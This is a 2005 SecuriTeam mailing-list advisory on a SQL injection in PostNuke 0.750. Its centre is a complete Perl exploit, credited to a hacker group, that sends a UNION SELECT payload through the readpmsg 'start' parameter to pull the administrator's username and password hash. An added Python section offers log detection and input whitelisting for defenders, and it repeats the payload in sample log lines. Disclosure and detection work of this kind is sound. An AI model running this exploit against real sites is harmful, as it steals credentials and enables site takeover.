[EXPL] PostNuke SQL Injection (start, Exploit)

From: SecuriTeam (support_at_securiteam.com)
Date: 07/05/05

    To: list@securiteam.com
    Date: 5 Jul 2005 14:00:35 +0200

    The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com
    - - - - - - - - -

      PostNuke SQL Injection (start, Exploit)
    ------------------------------------------------------------------------

    SUMMARY

    " <http://www.postnuke.com/> PostNuke is one of the most powerful open
    source content management systems in the world ..."

    PostNuke is vulnerable to SQL injection through the "start" parameter of
    the Messages/readpmsg module. The following exploit uses this injection to
    retrieve the administrator's username and password (MD5 hash) from the
    pn_users table.

    DETAILS

    Vulnerable Systems:
     * PostNuke version 0.750

    Exploit:
    #!/usr/bin/perl
    # This tool is only for educational purposes
    #
    # K-C0d3r a x0n3-h4ck friend !!!
    #
    # This exploit should give admin nick and md5 password
    #
    #-=[ PostNuke SQL Injection version : x=> 0.750]=-
    #-=[ ]=-
    #-=[ Discovered by sp3x ]=-
    #-=[ Coded by K-C0d3r ]=-
    #-=[ irc.xoned.net #x0n3-h4ck to find me K-c0d3r[at]x0n3-h4ck.org]=-
    #
    # Greetz to mZ, 2b TUBE, off, rikky, milw0rm, str0ke
    #
    # !!! NOW IS PUBLIC (6-6-2005) !!!

    use strict;
    use warnings;
    use IO::Socket;

    sub Usage {
        print STDERR "Usage: KCpnuke-xpl.pl <www.victim.com> </path/to/modules.php>\n";
        exit;
    }

    # Exactly two arguments are expected: the host and the path to modules.php.
    Usage() unless @ARGV == 2;

    my $host = $ARGV[0];
    my $path = $ARGV[1];

    print "[K-C0d3r] PostNuke SQL Injection [x0n3-h4ck]\n";
    print "[+] Connecting to $host\n";

    # The injected value is carried in the "start" parameter of the
    # Messages/readpmsg module; the UNION selects pn_uname/pn_pass from
    # pn_users and the trailing "/*" comments out the rest of the query.
    my $injection = "$host/$path?";
    $injection .= "op=modload&name=Messages&file=readpmsg&start=0";
    $injection .= "%20UNION%20SELECT%20pn_uname,null,";
    $injection .= "pn_uname,pn_pass,pn_pass,null,pn_pass,null";
    $injection .= "%20FROM%20pn_users%20WHERE%20pn_uid=";
    $injection .= "2/*&total_messages=1";

    my $socket = IO::Socket::INET->new(PeerAddr => $host,
                                       PeerPort => 80,
                                       Proto    => 'tcp')
        or die "Cannot connect to $host\n";

    print "[+] Injecting command ...\n";
    # HTTP requires CRLF line endings; the request uses an absolute URI.
    print $socket "GET http://$injection HTTP/1.1\r\nHost: $host\r\n\r\n";

    # Prints the first line of the server response and then exits.
    while (<$socket>) {
        print $_;
        exit;
    }
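    For defenders, an added example in Python (not part of this advisory or of the PostNuke code base): it scans constructed access-log lines for requests to modules.php whose Messages/readpmsg "start" parameter is not a plain non-negative integer, which is the shape of the request the exploit above sends, and it shows the whitelist check that readpmsg should apply before using "start" in a query. The log lines, client IP addresses and timestamps are constructed.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Combined-format access log; only the quoted request field is needed here.
LOG_RE = re.compile(r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+"')

# Constructed sample lines: a benign readpmsg request, then one carrying the
# UNION SELECT payload from the advisory.
SAMPLE_LOG = [
    '10.0.0.5 - - [05/Jul/2005:14:00:35 +0200] "GET /modules.php?op=modload'
    '&name=Messages&file=readpmsg&start=0&total_messages=1 HTTP/1.1" 200 1834',
    '10.0.0.9 - - [05/Jul/2005:14:01:02 +0200] "GET /modules.php?op=modload'
    '&name=Messages&file=readpmsg&start=0%20UNION%20SELECT%20pn_uname,null,'
    'pn_uname,pn_pass,pn_pass,null,pn_pass,null%20FROM%20pn_users%20WHERE'
    '%20pn_uid=2/*&total_messages=1 HTTP/1.1" 200 2210',
]

def valid_start(value):
    """Whitelist check: 'start' is a message offset, so only a non-negative
    integer is acceptable. Anything else must be rejected before it reaches
    the SQL query; no escaping is needed once the value is known to be digits."""
    return value.isdigit()

def check_request(target):
    """Return a reason string if the request target is a readpmsg call whose
    'start' parameter fails the whitelist, else None."""
    parts = urlsplit(target)
    if not parts.path.endswith('/modules.php'):
        return None
    # parse_qs percent-decodes, so "%20UNION" becomes " UNION" here.
    qs = parse_qs(parts.query, keep_blank_values=True)
    if qs.get('name') != ['Messages'] or qs.get('file') != ['readpmsg']:
        return None
    for raw in qs.get('start', []):
        if not valid_start(raw):
            return f'non-numeric start parameter: {raw!r}'
    return None

def scan_log(lines):
    """Return (client_ip, reason) for every log line that matches."""
    alerts = []
    for line in lines:
        m = LOG_RE.search(line)
        if m:
            reason = check_request(m.group('target'))
            if reason:
                alerts.append((line.split()[0], reason))
    return alerts
```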

    ADDITIONAL INFORMATION

    The information has been provided by <mailto:K-c0d3r[at]x0n3-h4ck.org>
    K-C0d3r.

    ========================================

    This bulletin is sent to members of the SecuriTeam mailing list.
    To unsubscribe from the list, send mail with an empty subject line and body to: list-unsubscribe@securiteam.com
    In order to subscribe to the mailing list, simply forward this email to: list-subscribe@securiteam.com

    ====================
    ====================

    DISCLAIMER:
    The information in this bulletin is provided "AS IS" without warranty of any kind.
    In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages.


